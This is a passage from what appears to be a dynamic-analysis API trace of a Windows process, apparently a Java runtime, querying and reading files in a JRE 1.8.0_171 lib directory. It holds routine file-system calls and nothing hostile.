lpNewFilePointer=0x208e2f0*=54617967) returned 1 [0105.284] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2c0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208e2c0*=0xa0, lpOverlapped=0x0) returned 1 [0105.285] malloc (_Size=0x2c) returned 0x12298880 [0105.292] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.292] malloc (_Size=0x74) returned 0x122f4a10 [0105.292] wcscpy (in: _Dest=0x122f4a10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" [0105.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x208dde8, lpFilePart=0x208dde0 | out: lpBuffer="", lpFilePart=0x208dde0*=0x0) returned 0x35 [0105.292] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\resources.jar"), fInfoLevelId=0x0, lpFileInformation=0x208db80 | out: lpFileInformation=0x208db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb478df6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb478df6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb480313, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x354ab0)) returned 1 [0105.295] free (_Block=0x122f4a10) [0105.296] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index") returned 0x31 [0105.296] malloc (_Size=0x6e) returned 0x122f5f90 [0105.296] wcscpy (in: _Dest=0x122f5f90, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index" [0105.296] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index", nBufferLength=0x9, lpBuffer=0x208dd48, lpFilePart=0x208dd40 | out: lpBuffer="", lpFilePart=0x208dd40*=0x0) returned 0x32 [0105.296] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\meta-index"), fInfoLevelId=0x0, lpFileInformation=0x208dae0 | out: lpFileInformation=0x208dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb470635, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb470635, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb470635, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x84e)) returned 1 [0105.296] free (_Block=0x122f5f90) [0105.296] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index") returned 0x31 [0105.296] malloc (_Size=0x6e) returned 0x122f4c90 [0105.296] wcscpy (in: _Dest=0x122f4c90, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index" [0105.297] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\meta-index"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0105.297] free (_Block=0x122f4c90) [0105.298] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.298] malloc (_Size=0x800) returned 0x122ff750 [0105.298] _wfullpath (in: _Buffer=0x122ff750, _Path="C:\\Program Files\\Java\\jre1.8.0_171\\lib", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib" [0105.298] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.298] wcsncmp (_String1="C:\\P", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0105.299] wcslen (_String="C:\\Program Files") returned 0x10 [0105.299] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x208d1d0 | out: lpFindFileData=0x208d1d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6fb22070, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x426320 [0105.299] FindClose (in: hFindFile=0x426320 | out: hFindFile=0x426320) returned 1 [0105.299] wcslen (_String="Program Files") returned 0xd [0105.299] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0105.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208d1d0 | out: lpFindFileData=0x208d1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6fb22070, cFileName="Java", cAlternateFileName="")) returned 0x4264a0 [0105.299] FindClose (in: hFindFile=0x4264a0 | out: hFindFile=0x4264a0) returned 1 [0105.299] wcslen (_String="Java") returned 0x4 [0105.299] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0105.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208d1d0 | out: lpFindFileData=0x208d1d0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6fb22070, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x425c00 [0105.300] FindClose (in: hFindFile=0x425c00 | out: hFindFile=0x425c00) returned 1 [0105.300] wcslen (_String="jre1.8.0_171") returned 0xc [0105.300] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.300] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", lpFindFileData=0x208d1d0 | out: lpFindFileData=0x208d1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x6fb22070, cFileName="lib", cAlternateFileName="")) returned 0x426320 [0105.300] FindClose (in: hFindFile=0x426320 | out: hFindFile=0x426320) returned 1 [0105.300] wcslen (_String="lib") returned 0x3 [0105.300] free (_Block=0x122ff750) [0105.300] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.300] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.300] malloc (_Size=0x58) returned 0x122f8a10 [0105.301] wcscpy (in: _Dest=0x122f8a10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib" [0105.301] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", nBufferLength=0x9, lpBuffer=0x208dc08, lpFilePart=0x208dc00 | out: lpBuffer="", lpFilePart=0x208dc00*=0x0) returned 0x27 [0105.301] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib"), fInfoLevelId=0x0, lpFileInformation=0x208d9a0 | out: lpFileInformation=0x208d9a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0105.302] free (_Block=0x122f8a10) [0105.302] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.302] malloc (_Size=0x58) returned 0x122f8e30 [0105.302] wcscpy (in: _Dest=0x122f8e30, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib" [0105.302] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", nBufferLength=0x9, lpBuffer=0x208dc08, lpFilePart=0x208dc00 | out: lpBuffer="", lpFilePart=0x208dc00*=0x0) returned 0x27 [0105.302] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib"), fInfoLevelId=0x0, lpFileInformation=0x208d9a0 | out: lpFileInformation=0x208d9a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0105.302] free (_Block=0x122f8e30) [0105.303] ReadFile (in: hFile=0x2c4, lpBuffer=0x208b920, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b8f0, lpOverlapped=0x0 | out: lpBuffer=0x208b920*, lpNumberOfBytesRead=0x208b8f0*=0x84e, lpOverlapped=0x0) returned 1 [0105.305] GetFileType (hFile=0x2c4) returned 0x1 [0105.305] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x208da00, dwMoveMethod=0x1 | out: lpNewFilePointer=0x208da00*=2126) returned 1 [0105.305] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x208da10 | out: lpFileSize=0x208da10*=2126) returned 1 [0105.318] ReadFile (in: hFile=0x2c4, lpBuffer=0x208b8d0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b8a0, lpOverlapped=0x0 | out: lpBuffer=0x208b8d0*, lpNumberOfBytesRead=0x208b8a0*=0x0, lpOverlapped=0x0) returned 1 [0105.319] CloseHandle (hObject=0x2c4) returned 1 [0105.319] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0105.319] malloc (_Size=0x66) returned 0x1220f800 [0105.319] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" [0105.319] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", nBufferLength=0x9, lpBuffer=0x208dde8, lpFilePart=0x208dde0 | out: lpBuffer="", lpFilePart=0x208dde0*=0x0) returned 0x2e [0105.319] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\rt.jar"), fInfoLevelId=0x0, lpFileInformation=0x208db80 | out: lpFileInformation=0x208db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8beacf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb8beacf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed0077b9, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x341fe37)) returned 1 [0105.320] free (_Block=0x1220f800) [0105.321] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned 0x35 [0105.321] malloc (_Size=0x76) returned 0x122f4890 [0105.321] wcscpy (in: _Dest=0x122f4890, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" [0105.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar", nBufferLength=0x9, lpBuffer=0x208dde8, lpFilePart=0x208dde0 | out: lpBuffer="", lpFilePart=0x208dde0*=0x0) returned 0x36 [0105.321] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\sunrsasign.jar"), fInfoLevelId=0x0, lpFileInformation=0x208db80 | out: lpFileInformation=0x208db80*(dwFileAttributes=0x208dbc8, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x208dc20, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x2207ae0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x62, nFileSizeHigh=0x0, nFileSizeLow=0x62)) returned 0 [0105.321] GetLastError () returned 0x2 [0105.321] free (_Block=0x122f4890) [0105.322] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 0x2f [0105.322] malloc (_Size=0x6a) returned 0x122f5190 [0105.322] wcscpy (in: _Dest=0x122f5190, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" [0105.322] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar", nBufferLength=0x9, lpBuffer=0x208dde8, lpFilePart=0x208dde0 | out: lpBuffer="", lpFilePart=0x208dde0*=0x0) returned 0x30 [0105.322] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jsse.jar"), fInfoLevelId=0x0, lpFileInformation=0x208db80 | out: lpFileInformation=0x208db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed06ba66, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed06ba66, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed08b63d, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x916df)) returned 1 [0105.323] free (_Block=0x122f5190) [0105.324] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0105.325] malloc (_Size=0x68) returned 0x1220f950 [0105.325] wcscpy (in: _Dest=0x1220f950, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" [0105.325] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", nBufferLength=0x9, lpBuffer=0x208dde8, lpFilePart=0x208dde0 | out: lpBuffer="", lpFilePart=0x208dde0*=0x0) returned 0x2f [0105.325] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jce.jar"), fInfoLevelId=0x0, lpFileInformation=0x208db80 | out: lpFileInformation=0x208db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb45a81e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb45a81e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb45b939, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1c3c3)) returned 1 [0105.329] free (_Block=0x1220f950) [0105.329] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar") returned 0x33 [0105.329] malloc (_Size=0x72) returned 0x122f5b10 [0105.329] wcscpy (in: _Dest=0x122f5b10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" [0105.329] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar", nBufferLength=0x9, lpBuffer=0x208dde8, lpFilePart=0x208dde0 | out: lpBuffer="", lpFilePart=0x208dde0*=0x0) returned 0x34 [0105.330] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\charsets.jar"), fInfoLevelId=0x0, lpFileInformation=0x208db80 | out: lpFileInformation=0x208db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed0d231e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed0d231e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa)) returned 1 [0105.330] free (_Block=0x122f5b10) [0105.332] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar") returned 0x2e [0105.332] malloc (_Size=0x68) returned 0x1220f640 [0105.332] wcscpy (in: _Dest=0x1220f640, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" [0105.332] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar", nBufferLength=0x9, lpBuffer=0x208dde8, lpFilePart=0x208dde0 | out: lpBuffer="", lpFilePart=0x208dde0*=0x0) returned 0x2f [0105.332] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jfr.jar"), fInfoLevelId=0x0, lpFileInformation=0x208db80 | out: lpFileInformation=0x208db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb461a65, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb461a65, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb4641bd, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x88e49)) returned 1 [0105.333] free (_Block=0x1220f640) [0105.334] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x2a [0105.334] malloc (_Size=0x60) returned 0x1220f640 [0105.334] wcscpy (in: _Dest=0x1220f640, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\classes" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_171\\classes" [0105.335] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes", nBufferLength=0x9, lpBuffer=0x208dde8, lpFilePart=0x208dde0 | out: lpBuffer="", lpFilePart=0x208dde0*=0x0) returned 0x2b [0105.335] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes" (normalized: "c:\\program files\\java\\jre1.8.0_171\\classes"), fInfoLevelId=0x0, lpFileInformation=0x208db80 | out: lpFileInformation=0x208db80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x61c76049, ftLastAccessTime.dwLowDateTime=0x7ffb, ftLastAccessTime.dwHighDateTime=0x2207ae0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x62, nFileSizeHigh=0x0, nFileSizeLow=0x62)) returned 0 [0105.335] GetLastError () returned 0x2 [0105.335] free (_Block=0x1220f640) [0105.335] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\meta-index") returned 0x2d [0105.336] malloc (_Size=0x66) returned 0x1220f800 [0105.336] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_171\\meta-index" [0105.336] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\meta-index", nBufferLength=0x9, lpBuffer=0x208dd48, lpFilePart=0x208dd40 | out: lpBuffer="", lpFilePart=0x208dd40*=0x0) returned 0x2e [0105.336] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_171\\meta-index"), fInfoLevelId=0x0, lpFileInformation=0x208dae0 | out: lpFileInformation=0x208dae0*(dwFileAttributes=0x208daa0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x40, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x11a1e618)) returned 0 [0105.336] GetLastError () returned 0x2 [0105.336] free (_Block=0x1220f800) [0105.347] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.347] malloc (_Size=0x800) returned 0x122f96d0 [0105.347] _wfullpath (in: _Buffer=0x122f96d0, _Path="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" [0105.347] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.347] wcsncmp (_String1="C:\\P", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0105.347] wcslen (_String="C:\\Program Files") returned 0x10 [0105.347] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x425b40 [0105.349] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0105.349] wcslen (_String="Program Files") returned 0xd [0105.349] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0105.349] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0x425b40 [0105.349] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0105.349] wcslen (_String="Java") returned 0x4 [0105.349] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0105.349] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x425f00 [0105.350] FindClose (in: hFindFile=0x425f00 | out: hFindFile=0x425f00) returned 1 [0105.350] wcslen (_String="jre1.8.0_171") returned 0xc [0105.350] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.350] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lib", cAlternateFileName="")) returned 0x426320 [0105.350] FindClose (in: hFindFile=0x426320 | out: hFindFile=0x426320) returned 1 [0105.350] wcslen (_String="lib") returned 0x3 [0105.350] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.350] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb478df6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb478df6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb480313, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x354ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="resources.jar", cAlternateFileName="RESOUR~1.JAR")) returned 0x426200 [0105.350] FindClose (in: hFindFile=0x426200 | out: hFindFile=0x426200) returned 1 [0105.350] wcslen (_String="resources.jar") returned 0xd [0105.351] free (_Block=0x122f96d0) [0105.351] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.352] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.352] malloc (_Size=0x74) returned 0x122f6690 [0105.352] wcscpy (in: _Dest=0x122f6690, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" [0105.352] GetFullPathNameW (in: lpFileName="C:\\Program 